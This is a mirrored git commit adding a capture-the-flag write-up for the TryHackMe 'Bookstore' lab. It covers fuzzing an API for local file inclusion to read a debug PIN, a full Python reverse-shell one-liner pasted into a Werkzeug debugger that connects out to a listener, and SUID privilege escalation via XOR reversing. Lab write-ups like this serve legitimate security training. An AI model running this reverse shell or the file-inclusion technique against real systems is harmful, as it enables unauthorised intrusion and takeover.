mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Add files via upload
This commit is contained in:
parent
f56a07cb35
commit
544ced2390
1 changed files with 144 additions and 0 deletions
144
TryHackMe/Bookstore.md
Normal file
144
TryHackMe/Bookstore.md
Normal file
|
@ -0,0 +1,144 @@
|
|||
# TryHackMe-Bookstore
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Nmap scan report for 10.10.117.123
|
||||
Host is up (0.15s latency).
|
||||
Not shown: 65532 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA)
|
||||
| 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA)
|
||||
|_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519)
|
||||
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|
||||
|_http-server-header: Apache/2.4.29 (Ubuntu)
|
||||
|_http-title: Book Store
|
||||
5000/tcp open http Werkzeug httpd 0.14.1 (Python 3.6.9)
|
||||
| http-robots.txt: 1 disallowed entry
|
||||
|_/api </p>
|
||||
|_http-title: Home
|
||||
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 1323.85 seconds
|
||||
|
||||
```
|
||||
|
||||
## PORT 80
|
||||
|
||||
<img src="https://imgur.com/TTzO2wr.png"/>
|
||||
|
||||
## PORT 5000
|
||||
|
||||
<img src="https://imgur.com/NDu92Ye.png"/>
|
||||
|
||||
As we saw from nmap scan that there is a `robots.txt` file at port 5000
|
||||
|
||||
<img src="https://imgur.com/dI8y0tJ.png"/>
|
||||
|
||||
<img src="https://imgur.com/4X8nlfw.png"/>
|
||||
|
||||
Running gobuster on this port we see a console a type of debugger
|
||||
|
||||
<img src="https://imgur.com/JhylVwm.png"/>
|
||||
|
||||
<img src="https://imgur.com/DRbVY4g.png"/>
|
||||
|
||||
But it's asking for a PIN.
|
||||
|
||||
I found a metasploit exploit for it but it didn't worked
|
||||
|
||||
<img src="https://imgur.com/oGgxBQO.png"/>
|
||||
|
||||
Going back to port 80 and then looking at the login page source we find that PIN is in bash history file of user `sid`.
|
||||
|
||||
We know there are two versions of api v1 and v2 , v1 is likely to be vulnerable to LFI so let's choose the endpoint that has a parameter
|
||||
|
||||
`/api/v2/resources/books?id=1`
|
||||
|
||||
Change this to
|
||||
|
||||
`/api/v1/resources/books?id=.bash_history`
|
||||
|
||||
then put it in `wfuzz`
|
||||
|
||||
### Wfuzz
|
||||
|
||||
```
|
||||
wfuzz -u http://10.10.117.123:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
|
||||
```
|
||||
|
||||
Here
|
||||
|
||||
`-u` the host with the api-endpoint
|
||||
`?FUZZ` here ? is before the paramter and "FUZZ" is the location where we want to find the paramter
|
||||
`--hc` is telling to hide status codes like 404 which is not found
|
||||
|
||||
<img src="https://imgur.com/xh9A7H1.png"/>
|
||||
|
||||
<img src="https://imgur.com/TJWxLdg.png"/>
|
||||
|
||||
```
|
||||
cd /home/sid whoami export WERKZEUG_DEBUG_PIN=123-321-135 echo $WERKZEUG_DEBUG_PIN python3 /home/sid/api.py ls exit
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/AB6oKEG.png"/>
|
||||
|
||||
And now we can interact with the debugger also in order to get into the box we have to paste a reverse shell there
|
||||
|
||||
```
|
||||
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.209.100",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
|
||||
|
||||
```
|
||||
Paste this on to the debugger and set your netcat listener
|
||||
|
||||
<img src="https://imgur.com/sbTCu2l.png"/>
|
||||
|
||||
|
||||
## Privlege Escalation
|
||||
|
||||
|
||||
<img src="https://imgur.com/VZSpKHD.png"/>
|
||||
|
||||
We see a binary which has a SUID on it so it can run as a root but we need to figure out what it is doing and how we can execute it properly to get root
|
||||
|
||||
|
||||
On analyzing the binary with `ghidra`
|
||||
|
||||
<img src="https://imgur.com/F16KKwC.png"/>
|
||||
|
||||
? ----> local_1c is the number we are going to input
|
||||
4374 ---->
|
||||
23987 ---> local_18
|
||||
|
||||
local_14 has to be this number 1573724660
|
||||
|
||||
I have converted those hexadecimal number to decimal to get a better understanding
|
||||
|
||||
|
||||
`local_14 = local_1c ^ 4374 ^ local_18`
|
||||
|
||||
|
||||
What's happening in here is that these three values are getting through and exclusive OR operator `^` .We don't know what value we put inorder to get `1573724660`.
|
||||
|
||||
So I'll convert hex values to decimal and XOR between them
|
||||
|
||||
```
|
||||
1573724660 ^ 4374 ^ local_18
|
||||
|
||||
1573724660 ^ 4374 ^ 23987
|
||||
|
||||
1573724660 ^ 19621
|
||||
|
||||
1573743953
|
||||
|
||||
```
|
||||
<img src="https://imgur.com/Bk3Svt9.png"/>
|
||||
|
||||
Let's try the final result we got
|
||||
|
||||
<img src="https://imgur.com/8AdgZpm.png"/>
|
||||
|
||||
And we are root !
|
Loading…
Reference in a new issue